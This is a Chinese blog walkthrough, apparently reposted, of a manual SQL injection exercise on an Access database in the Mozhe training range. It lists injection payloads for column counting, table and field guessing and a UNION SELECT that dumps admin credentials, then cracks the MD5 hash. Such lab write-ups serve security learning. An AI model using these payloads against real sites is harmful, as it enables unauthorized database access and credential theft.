墨者靶场 SQL手工注入漏洞测试(Access数据库)

Posted 曹振国cc

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了墨者靶场 SQL手工注入漏洞测试(Access数据库)相关的知识,希望对你有一定的参考价值。

关于Access:

Access 是表的集合

Access 数据库的结构 => 表、字段

select xxx from 表 => 正常查询

想知道access的表名你只能去猜

常见的表:
admin news job work admin_user user

进入环境:

image-20210620090948544

1.寻找注入点
?id=1 and 1=1		//正常
?id=1 and 1=2 		//报错

image-20210620091639993

2.查询字段数
//有4个字段
?id=1 and 1=1 order by 4	//正常
?id=1 and 1=1 order by 5  	//报错

image-20210620092848842

3.猜测它有admin表
?id=1 and existe (select*from admin)	//正常

image-20210620092111929

4.猜字段
//字段有:id username passwd
?id=1 and existe (select id from admin)			//正常
?id=1 and existe (select username from admin)	//正常
?id=1 and existe (select passwwd from admin)	//正常

image-20210620092510150

5.寻找输出点
?id=1 union select 1,2,3,4 from admin  //发现2,3是输出点

image-20210620093005289

6.查询username,passwd字段
?id=1 union select 1,username,passwd,4 from admin	//查出 username:moke	passwd:7e6ec4fadf84938f

image-20210620093320866

md5解密,进入后台拿到key值

image-20210620093504305
image-20210620093538528

以上是关于墨者靶场 SQL手工注入漏洞测试(Access数据库)的主要内容,如果未能解决你的问题,请参考以下文章

墨者靶场 SQL手工注入漏洞测试(MySQL数据库-字符型)

墨者靶场 SQL手工注入漏洞测试(MySQL数据库-字符型)

墨者靶场SQL手工注入漏洞测试(Sql Server数据库)

墨者靶场SQL手工注入漏洞测试(Sql Server数据库)

零基础学习MYSQL高版本手工联合注入(墨者靶场)

NOSQL MongoDB 注入——本质上还是和sql注入是类似的